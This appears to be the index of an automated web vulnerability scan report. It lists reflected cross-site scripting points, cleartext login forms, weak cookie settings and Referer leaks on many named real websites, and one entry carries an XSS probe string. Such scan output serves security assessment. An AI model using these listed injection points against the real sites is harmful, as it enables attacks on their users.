1.1. http://politicalwire.com/favicon.ico [REST URL parameter 1]
1.2. http://www.cambridge.org/favicon.ico [REST URL parameter 1]
1.3. http://www.dogpile.com/dogpile_other/ws/index [Referer HTTP header]
1.4. http://www.dogpile.com/dogpile_other/ws/index [wsViewRecent cookie]
2. Cross-site scripting (reflected)
2.1. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 2]
2.2. http://a.collective-media.net/adj/ns.androidtapp/general [REST URL parameter 3]
2.4. http://a.collective-media.net/adj/ns.androidtapp/general [ppos parameter]
2.5. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 1]
2.6. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 2]
2.7. http://a.collective-media.net/cmadj/ns.androidtapp/general [REST URL parameter 3]
2.8. http://a.collective-media.net/cmadj/ns.androidtapp/general [ppos parameter]
2.9. http://ads.adxpose.com/ads/ads.js [uid parameter]
2.10. http://api.ipinfodb.com/v2/ip_query_country.php [callback parameter]
2.12. http://b.scorecardresearch.com/beacon.js [c1 parameter]
2.13. http://b.scorecardresearch.com/beacon.js [c15 parameter]
2.14. http://b.scorecardresearch.com/beacon.js [c2 parameter]
2.15. http://b.scorecardresearch.com/beacon.js [c3 parameter]
2.16. http://b.scorecardresearch.com/beacon.js [c4 parameter]
2.17. http://b.scorecardresearch.com/beacon.js [c5 parameter]
2.18. http://b.scorecardresearch.com/beacon.js [c6 parameter]
2.19. http://event.adxpose.com/event.flow [uid parameter]
2.20. http://ib.adnxs.com/ab [cnd parameter]
2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]
2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]
2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]
2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]
2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]
2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]
2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]
2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]
2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]
2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]
2.32. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]
2.33. http://suggest.infospace.com/QuerySuggest/SuggestServlet [reqID parameter]
2.34. http://view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]
2.35. http://view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]
2.37. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]
2.38. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]
2.39. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]
2.40. http://view.c3metrics.com/v.js [cid parameter]
2.41. http://view.c3metrics.com/v.js [id parameter]
2.42. http://view.c3metrics.com/v.js [t parameter]
2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1]
2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1]
2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]
2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1]
2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]
2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]
2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]
2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]
2.56. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 2]
2.57. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 3]
2.58. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]
2.59. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]
2.60. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]
2.61. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]
2.62. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]
2.63. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]
2.64. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]
2.65. http://www.androidtapp.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]
2.70. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 1]
2.71. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 2]
2.72. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 3]
2.73. http://www.androidtapp.com/wp-content/themes/AndroidTappv3/favicon.ico [REST URL parameter 4]
2.74. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
2.75. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
2.76. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1]
2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1]
2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter]
2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1]
2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2]
2.83. http://www.cambridge.org/uk/404_error.asp [error parameter]
2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2]
2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3]
2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4]
2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2]
2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3]
2.90. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]
2.91. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11 [qcat parameter]
2.94. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [qcat parameter]
2.95. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
2.96. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
2.97. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11 [qcat parameter]
2.98. http://www.kicksonfire.com/favicon.ico [REST URL parameter 1]
2.99. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]
2.100. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]
2.101. http://www.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]
2.102. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]
2.103. http://www.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]
2.104. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]
2.105. http://www.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]
2.106. http://www.ny1.com/favicon.ico [80003'-alert(1)-'46fe3f653ad parameter]
2.107. http://www.ny1.com/favicon.ico [REST URL parameter 1]
2.108. http://www.ny1.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.109. http://www.ottawacitizen.com/favicon.ico [REST URL parameter 1]
2.110. http://www.quickyellow.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.111. http://www.swiftpage1.com/favicon.ico [REST URL parameter 1]
2.112. http://www.swiftpage1.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.113. http://www.viagra.com/favicon.ico [REST URL parameter 1]
2.114. http://www.viagra.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.115. http://community.dogpile.com/ [User-Agent HTTP header]
2.116. http://support.dogpile.com/pressroom/ [User-Agent HTTP header]
2.117. http://www.blacksingles.com/favicon.ico [Referer HTTP header]
2.118. http://www.palomar.edu/favicon.ico [Referer HTTP header]
2.119. http://www.palomar.edu/favicon.ico [User-Agent HTTP header]
2.120. http://a.collective-media.net/cmadj/ns.androidtapp/general [cli cookie]
2.122. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]
2.123. http://www.8tracks.com/favicon.ico [REST URL parameter 1]
2.124. http://www.8tracks.com/favicon.ico [REST URL parameter 1]
2.125. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11 [DomainSession cookie]
2.126. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11 [DomainSession cookie]
2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]
2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]
2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]
2.136. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11 [DomainSession cookie]
2.138. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11 [DomainSession cookie]
2.143. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes [DomainSession cookie]
2.144. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]
2.145. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11 [DomainSession cookie]
2.146. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11 [DomainSession cookie]
2.147. http://www.dogpile.com/dogpile_rss/ws/index/ [DomainSession cookie]
2.148. http://www.dogpile.com/favicon.ico [DomainSession cookie]
2.149. http://www.dogpile.com/info.dogpl.rss/Web6c5ea//' [DomainSession cookie]
2.150. http://www.dogpile.com/info.dogpl.rss/web/GE+Zero+Taxes [DomainSession cookie]
2.151. http://www.dogpile.com/info.dogpl.rss/web/Go+Daddy+CEO+Elephant [DomainSession cookie]
2.152. http://www.dogpile.com/info.dogpl.rss/web/MLB+Schedule [DomainSession cookie]
2.153. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.154. http://www.force.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.155. http://www.mercantila.com/website/shoppingcart/cartbroker.php [merc_uid cookie]
2.156. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]
2.157. http://www.mrnumber.com/favicon.ico [REST URL parameter 1]
2.158. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.159. http://www.mrnumber.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.160. http://www.opinionoutpost.com/favicon.ico [REST URL parameter 1]
2.161. http://www.opinionoutpost.com/favicon.ico [name of an arbitrarily supplied request parameter]
2.162. http://www.rateyourmusic.com/favicon.ico [REST URL parameter 1]
2.163. http://www.rateyourmusic.com/favicon.ico [name of an arbitrarily supplied request parameter]
3. Cleartext submission of password
3.1. http://ecards.myfuncards.com/myfuncards/404
3.2. http://www.androidtapp.com/wp-login.php
5. ASP.NET ViewState without MAC enabled
5.1. http://www.maybenow.com/favicon.ico
5.2. http://www.nabiscoworld.com/favicon.ico
6. Cookie scoped to parent domain
6.1. http://www.888.com/favicon.ico
6.3. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1
6.4. http://www.dogpile.com/clickserver/_iceUrlFlag=1
6.5. http://www.dogpile.com/dogpile/ws/about/
6.6. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
6.7. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
6.8. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11
6.9. http://www.dogpile.com/dogpile/ws/faq/
6.10. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
6.11. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11
6.13. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
6.14. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
6.15. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
6.16. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
6.17. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
6.18. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
6.19. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
6.20. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
6.21. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
6.22. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
6.23. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
6.24. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
6.25. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
6.26. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
6.27. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
6.28. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
6.29. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
6.30. http://www.dogpile.com/dogpile_other/ws/index
6.31. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
6.32. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
6.33. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
6.34. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
6.35. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
6.36. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
6.37. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
6.38. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
6.40. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
6.42. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
6.43. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11
6.49. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
6.50. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
6.51. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11
6.52. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
6.53. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
6.54. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
6.55. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
6.56. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
6.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
6.59. http://www.dogpile.com/dogpile_rss/ws/index/
6.60. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
6.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
6.62. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
6.63. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
6.64. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
6.65. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
6.66. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11
6.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
6.87. http://a.collective-media.net/adj/ns.androidtapp/general
6.88. http://ad.amgdgt.com/ads/
6.89. http://b.scorecardresearch.com/b
6.90. http://b.scorecardresearch.com/p
6.91. http://bh.contextweb.com/bh/set.aspx
6.92. http://cf.addthis.com/red/p.json
6.94. http://leadback.advertising.com/adcedge/lb
6.95. http://m.adnxs.com/msftcookiehandler
6.96. http://pixel.33across.com/ps/
6.97. http://pixel.fetchback.com/serve/fb/pdc
6.98. http://pixel.quantserve.com/pixel
6.109. http://safebrowsing.clients.google.com/safebrowsing/downloads
6.110. http://syndication.mmismm.com/tntwo.php
6.111. http://tags.bluekai.com/site/2045
6.112. http://tags.bluekai.com/site/2731
6.113. http://view.c3metrics.com/c3VTabstrct-6-2.php
6.114. http://www.amway.com/favicon.ico
6.115. http://www.bbpeoplemeet.com/favicon.ico
6.116. http://www.belkin.com/favicon.ico
6.117. http://www.jpcycles.com/favicon.ico
6.118. http://www.loveandseek.com/favicon.ico
6.119. http://www.mercantila-checkout.com/setcookie.js
6.120. http://www.progressiveagent.com/favicon.ico
6.121. http://www.rambler.ru/favicon.ico
6.122. http://www.wpbf.com/favicon.ico
7. Cookie without HttpOnly flag set
7.1. http://ads.adxpose.com/ads/ads.js
7.2. http://community.dogpile.com/
7.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
7.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
7.6. http://event.adxpose.com/event.flow
7.7. http://support.dogpile.com/pressroom/
7.8. http://www.888.com/favicon.ico
7.9. http://www.adleaf.com/favicon.ico
7.10. http://www.cambridge.org/uk/date/writeYear_js.asp
7.12. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1
7.13. http://www.dogpile.com/clickserver/_iceUrlFlag=1
7.14. http://www.dogpile.com/dogpile/ws/about/
7.15. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11
7.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11
7.17. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11
7.18. http://www.dogpile.com/dogpile/ws/faq/
7.19. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
7.20. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11
7.22. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11
7.23. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11
7.24. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11
7.25. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11
7.26. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11
7.27. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11
7.28. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11
7.29. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11
7.30. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11
7.31. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11
7.32. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11
7.33. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11
7.34. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11
7.35. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11
7.36. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11
7.37. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11
7.38. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11
7.39. http://www.dogpile.com/dogpile_other/ws/index
7.40. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11
7.41. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11
7.42. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11
7.43. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11
7.44. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11
7.45. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11
7.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11
7.47. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11
7.49. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11
7.51. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11
7.52. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11
7.58. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11
7.59. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11
7.60. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11
7.61. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes
7.62. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant
7.63. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule
7.64. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11
7.65. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11
7.66. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11
7.68. http://www.dogpile.com/dogpile_rss/ws/index/
7.69. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11
7.70. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11
7.71. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11
7.72. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11
7.73. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11
7.74. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11
7.75. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11
7.95. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11
7.96. http://www.gospel.com/favicon.ico
7.97. http://www.hughesnetpower.com/favicon.ico
7.98. http://www.mappoint.net/favicon.ico
7.99. http://www.mercantila-checkout.com/setcookie.js
7.100. http://www.mercantila.com/
7.101. http://www.myjobprospects.com/favicon.ico
7.102. http://a.collective-media.net/adj/ns.androidtapp/general
7.103. http://ad.amgdgt.com/ads/
7.104. http://ad.yieldmanager.com/pixel
7.105. http://ad.yieldmanager.com/unpixel
7.106. http://b.scorecardresearch.com/b
7.107. http://b.scorecardresearch.com/p
7.108. http://bh.contextweb.com/bh/set.aspx
7.109. http://cf.addthis.com/red/p.json
7.110. http://leadback.advertising.com/adcedge/lb
7.111. http://mm.chitika.net/minimall
7.112. http://pixel.33across.com/ps/
7.113. http://pixel.fetchback.com/serve/fb/pdc
7.114. http://pixel.quantserve.com/pixel
7.125. http://safebrowsing.clients.google.com/safebrowsing/downloads
7.126. http://syndication.mmismm.com/tntwo.php
7.127. http://tags.bluekai.com/site/2045
7.128. http://tags.bluekai.com/site/2731
7.129. http://view.c3metrics.com/c3VTabstrct-6-2.php
7.130. http://www.allgetaways.com/favicon.ico
7.131. http://www.amway.com/favicon.ico
7.132. http://www.androidtapp.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php
7.133. http://www.androidtapp.com/wp-login.php
7.134. http://www.battleofthecheetos.com/favicon.ico
7.135. http://www.belkin.com/favicon.ico
7.136. http://www.betus.com/favicon.ico
7.137. http://www.billoreilly.com/favicon.ico
7.138. http://www.blacksingles.com/favicon.ico
7.139. http://www.bluefly.com/favicon.ico
7.140. http://www.boardgamegeek.com/favicon.ico
7.141. http://www.bradsdeals.com/favicon.ico
7.142. http://www.cancercenter.com/favicon.ico
7.143. http://www.capella.edu/favicon.ico
7.144. http://www.caring4cancer.com/favicon.ico
7.145. http://www.chasefreedomnow.com/favicon.ico
7.146. http://www.cheapostay.com/favicon.ico
7.147. http://www.clearcontests.com/favicon.ico
7.148. http://www.csi-tracking.com/favicon.ico
7.149. http://www.dailydealfetcher.com/
7.150. http://www.deviceanywhere.com/favicon.ico
7.151. http://www.dmvnow.com/exec/common/VitaHeader-Redesign.css
7.152. http://www.dmvnow.com/exec/common/dmvnow2.css
7.153. http://www.dmvnow.com/exec/common/dmvprint.css
7.154. http://www.dmvnow.com/exec/common/textsizer.js
7.155. http://www.dmvnow.com/favicon.ico
7.156. http://www.dmvnow.com/images/aboutus_off.gif
7.157. http://www.dmvnow.com/images/aboutus_on.gif
7.158. http://www.dmvnow.com/images/ads/11042.jpg
7.159. http://www.dmvnow.com/images/ads/11092.jpg
7.160. http://www.dmvnow.com/images/ads/11134.jpg
7.161. http://www.dmvnow.com/images/ads/11153.jpg
7.162. http://www.dmvnow.com/images/ads/11190.jpg
7.163. http://www.dmvnow.com/images/ads/11216.jpg
7.164. http://www.dmvnow.com/images/breadcrumbcenter.jpg
7.165. http://www.dmvnow.com/images/citserv_on.gif
7.166. http://www.dmvnow.com/images/common_feel_bg.jpg
7.167. http://www.dmvnow.com/images/commserv_on.gif
7.168. http://www.dmvnow.com/images/contactus_off.gif
7.169. http://www.dmvnow.com/images/contactus_on.gif
7.170. http://www.dmvnow.com/images/dmv2.jpg
7.171. http://www.dmvnow.com/images/dmv3.jpg
7.172. http://www.dmvnow.com/images/dmv4.jpg
7.173. http://www.dmvnow.com/images/dmv7b.jpg
7.174. http://www.dmvnow.com/images/dmv8b.jpg
7.175. http://www.dmvnow.com/images/dmvcontent11.jpg
7.176. http://www.dmvnow.com/images/dmvgeneral1.jpg
7.177. http://www.dmvnow.com/images/dmvhome9.jpg
7.178. http://www.dmvnow.com/images/dmvhome_on.gif
7.179. http://www.dmvnow.com/images/dmvnow.jpg
7.180. http://www.dmvnow.com/images/forms_on.gif
7.181. http://www.dmvnow.com/images/geninfo_on.gif
7.182. http://www.dmvnow.com/images/go_ball.gif
7.183. http://www.dmvnow.com/images/icon_email.gif
7.184. http://www.dmvnow.com/images/icon_printergif.gif
7.185. http://www.dmvnow.com/images/moving_on.gif
7.186. http://www.dmvnow.com/images/officelocations_off.gif
7.187. http://www.dmvnow.com/images/officelocations_on.gif
7.188. http://www.dmvnow.com/images/online_on.gif
7.189. http://www.dmvnow.com/images/peak2000.jpg
7.190. http://www.dmvnow.com/images/resources_on.gif
7.191. http://www.dmvnow.com/images/se.gif
7.192. http://www.dmvnow.com/images/sitemap_off.gif
7.193. http://www.dmvnow.com/images/sitemap_on.gif
7.194. http://www.dmvnow.com/images/sw.gif
7.195. http://www.dmvnow.com/images/tanline.jpg
7.196. http://www.dmvnow.com/images/virginia_dot_gov_logo.jpg
7.197. http://www.dmvnow.com/images/virginia_seach_button-bg.jpg
7.198. http://www.dmvnow.com/images/virginia_seach_txt-bg.jpg
7.199. http://www.dmvnow.com/images/wcag1A.gif
7.200. http://www.dmvnow.com/images/webfeed.png
7.201. http://www.dogtimemedia.com/favicon.ico
7.202. http://www.driversed.com/favicon.ico
7.203. http://www.focusonthefamily.com/favicon.ico
7.204. http://www.guthy-renker-store.com/favicon.ico
7.205. http://www.heavygames.com/favicon.ico
7.206. http://www.jobtarget.com/favicon.ico
7.207. http://www.jpcycles.com/favicon.ico
7.208. http://www.kraftbrands.com/favicon.ico
7.209. http://www.lookupanyone.com/favicon.ico
7.210. http://www.membershiprewards.com/favicon.ico
7.211. http://www.mychasecreditcards.com/favicon.ico
7.212. http://www.nielsen.com/favicon.ico
7.213. http://www.nwf.org/favicon.ico
7.214. http://www.owners.com/favicon.ico
7.215. http://www.peopletopeople.com/favicon.ico
7.216. http://www.personalizationmall.com/favicon.ico
7.217. http://www.progressiveagent.com/favicon.ico
7.218. http://www.rambler.ru/favicon.ico
7.219. http://www.rcuniverse.com/favicon.ico
7.220. http://www.richard-group.com/favicon.ico
7.221. http://www.savingssavy.info/favicon.ico
7.222. http://www.sba.gov/favicon.ico
7.223. http://www.superherohype.com/favicon.ico
7.224. http://www.thebreastcancersite.com/favicon.ico
7.225. http://www.venus.com/favicon.ico
7.226. http://www.volunteermatch.org/favicon.ico
7.227. http://www.wpbf.com/favicon.ico
7.228. http://www.wyndham.com/favicon.ico
7.229. http://www.zoomshare.com/favicon.ico
8. Password field with autocomplete enabled
8.1. http://ecards.myfuncards.com/myfuncards/404
8.2. http://www.androidtapp.com/wp-login.php
11. Cross-domain Referer leakage
11.1. http://ad.amgdgt.com/ads/
11.2. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2
11.3. http://cim.meebo.com/cim/init.php
11.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11
